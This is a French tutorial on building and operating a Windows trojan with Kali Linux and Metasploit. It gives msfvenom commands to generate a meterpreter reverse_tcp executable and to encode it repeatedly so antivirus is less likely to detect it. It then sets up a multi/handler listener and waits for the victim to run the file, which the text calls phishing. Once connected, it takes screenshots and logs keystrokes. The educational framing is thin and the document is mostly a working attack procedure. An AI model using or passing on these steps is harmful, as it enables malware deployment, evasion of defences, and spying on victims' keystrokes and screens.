Conception d'un virus type Cheval

de Troie/Trojan avec Kali Linux

Un cheval de Troie ou Trojan en anglais est un programme qui donne l'accès à un ordinateur
ou système en paraissant à première vu être inoffensif, mais est au final conçu pour nuire à sa
cible.

La meilleure façon de comprendre le fonctionnement des attaquants est d'acquérir une

expérience pratique de leurs techniques. C'est pourquoi nous vous proposons de concevoir un
virus à l'aide du payload Meterpreter qui fournit un shell interactif à partir duquel un attaquant
peut exploiter la machine cible et exécuter du code.

Partie 1 : La conception du cheval de Troie

Étape 1: Mettre à jour et mettre à niveau Kali Linux

Vous devriez régulièrement mettre à jour Kali Linux. Si vous ne l'avez pas mis à niveau
depuis un certain temps ou si vous venez de le démarrer, c'est le bon moment pour le mettre à
jour.

Ouvrez le terminal en cliquant sur la fenêtre en haut et tapez:

sudo apt-get update

Pour appliquer les mises-à-jours, tapez:

sudo apt-get upgrade

Mettre à jour vers les versions les plus récentes contribue à la sécurité et garantit que les outils
fonctionnent correctement. Maintenant, nous pouvons commencer.

Étape 2: Ouvrir le logiciel d'exploitation

Nous allons utiliser Metasploit qui est un logiciel préinstallé sur toutes les machines Kali
Linux qui nous permettra de créer des payloads personnalisés qui seront reliés à notre Kali à
partir de l'ordinateur de la victime

MsfVenom est un générateur de payloads autonome produit par Metasploit qui combine et
remplace msfpayload et msfencode.

La liste des commandes disponibles sur msfvenom s'obtient avec la commande du même nom
:
msfvenom
Étape 3: Choisir le payload

Dans le contexte d'un virus ou d'un ver informatique, le payload ou charge utile en français est
la partie du malware qui effectue une action malveillante.

Pour récupérer la liste des payloads disponibles, utilisez :

msfvenom -l payloads

Meterpreter utilise un shell reverse_tcp, ce qui signifie qu'il se connecte à un point d'écoute
sur la machine de l'attaquant pour établir une connexion avec shell.

Il existe deux types de shells populaires: link et reverse. Un shell de liaison ouvre un nouveau
service sur la machine cible, et oblige l'attaquant à s'y connecter pour démarrer une session.
Un shell inversé (également appelé connect-back) oblige l'attaquant à configurer d'abord un
point d'écoute auquel la machine cible peut se connecter.

Étape 4: Personnaliser le payload

Il est aussi possible d'afficher les options liées au payload choisi :
msfvenom --list-options -p windows/meterpreter/reverse_tcp

Nous voyons que LHOST est vide et c'est justement à l'adresse qui nous définirons que
l'exploit enverra des informations à partir du périphérique infecté. Dans la plupart des cas, ce
sera votre adresse IP.
Le port d'écoute 4444 est définit par LPORT et sera celui utilisé par Kali Linux pour recevoir
la communication du cheval de Troie.

Pour trouver votre adresse IP, saisissez

ip address
Dans le terminal votre adresse IP se trouve après le mot «inet». Si vous êtes connecté à
Internet via Ethernet, utilisez l'adresse IP de la carte réseau eth0; si vous êtes connecté sans
fil, utilisez celle de wlan0 et enfin si vous êtes connectés à une machine VMWare elle pourrait
être sous ens33.

L'adresse IP sera notre paramètre LHOST.

Étape 5: Générer le cheval de Troie

Maintenant que nous avons notre charge utile, notre adresse IP et notre numéro de port, nous
avons toutes les informations dont nous avons besoin.

Pour pouvoir créer le fichier directement dans votre répertoire personnel, allez-y en utilisant :
cd
Vous pouvez maintenant créer un fichier exécutable à partir du payload, voici la syntaxe à
adapter :
msfvenom -p [payload] LHOST=[votre adresse ip] LPORT=[numéro de port] -f [type de
fichier] > [chemin du fichier]
Le type de fichier doit être exe et le chemin doit contenir le nom du fichier (n'oubliez pas
l'extension du fichier après le nom du fichier). Assurez-vous en particulier de ne pas
appuyer sur Entrée avant de mettre le «> [chemin du fichier]», car cela lancerait
l'exploit sur votre propre appareil.

Si nous regardons dans nos fichiers en utilisant ls, nous voyons que notre executable
apparaît.

Étape 6: Chiffrer le cheval de Troie

Étant donné que windows/meterpreter/reverse_tcp est un exploit courant, la plus part des
programmes antivirus le détecteront. Cependant, nous pouvons chiffrer le programme afin
qu'un antivirus est moins de chance de le détecter. Une longue liste des encoders est incluse
avec metasploit. Tapez :
msfvenom -l encoders
Une fois que vous avez choisi l'encoder souhaité (nous vous recommandons
x86/shikata_ga_nai), vous pouvez le chiffrer plusieurs fois lorsque vous tapez la commande
pour réaliser l'exploit. Le chiffrement du fichier plusieurs fois permet de rendre le programme
moins sensible aux antivirus.

Voici la syntaxe :
msfvenom -p [payload] LHOST=[votre adresse ip] LPORT=[numéro de port] -e
[encoder] -i [nombre d'applications] -f [type de fichier] > [chemin du fichier]

Étape 7: Exécuter le cheval de Troie sur une cible

Pour transférer l'exécutable vers un autre système nous vous conseillons l'envoie par SFTP.
D'abord il faut allumer le service ssh de Kali Linux avec :
service ssh start

Vous pouvez maintenant vous connectez via un client FTP depuis l'ordinateur cible pour
réaliser la partie suivante qui consistera à infiltrer un système Windows.
Partie 2 : Le contrôle du cheval de Troie
Pour la démonstration nous allons utiliser une machine virtuelle exécuté sous Windows 7.
Sur ce système il n'est pas nécessaire de désactiver la sécurité intégrée à Windows
contrairement à Windows 10 où la sécurité doit être désactivé pour continuer.

Étape 1: Démarrer une session meterpreter

La msfconsole est probablement l'interface la plus populaire du Metasploit Framework

(MSF). Il fournit une console centralisée «tout-en-un» qui vous permet d'accéder efficacement
à pratiquement toutes les options disponibles dans MSF. MSFconsole peut sembler intimidant
au début, mais une fois que vous aurez appris la syntaxe des commandes, vous apprendrez à
apprécier la puissance de l'utilisation de cette interface.

Ouvrez la "msfconsole" depuis le terminal ou meterpreter depuis le menu des applications.

Vous devriez alors voir un menu ouvert qui ressemble à ceci :

Tapez :
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
Si vous avez oublié comment trouver votre adresse IP dans l'article précédent, tapez
simplement ifconfig sur un nouveau terminal.
set lhost [votre adresse]
set lport 4444
Une fois que tout cela est fait, tapez «run» et la session commencera. La session continuera à
attendre que le fichier cheval de Troie soit exécuté.
run
Étape 2: Attendre le hameçonnage

Vous serez sur cet écran jusqu'à ce que la cible exécute le fichier, et une fois qu'elle le fera,
votre écran deviendra comme ceci:

De là, vous pouvez taper «help» pour voir une liste de commandes.
help

Étape 3: Passer à l'action

Il existe une tonne de commandes à expérimenter. Vous pouvez enregistrer le clavier de la

cible, prendre des captures d'écran, prendre des photos avec la webcam et bien plus encore.

Exemple, pour prendre une capture d'écran de l'ordinateur cible, tapez :

screenshot

La fonction que tout le monde adore.. Keyscan! Pour commencer à enregistrer le clavier
utilisez :
keyscan_start
Vous pouvez ensuite récupérer les entrées sur le clavier avec :
keyscan_dump
Enfin, pour arrêter l'enregistrement :
keyscan_stop

Pour quitter la session meterpreter, tapez simplement «exit».

exit

Et ce n'est que quelques-unes des nombreuses choses étonnantes que vous pouvez faire avec
meterpreter et Metasploit en général.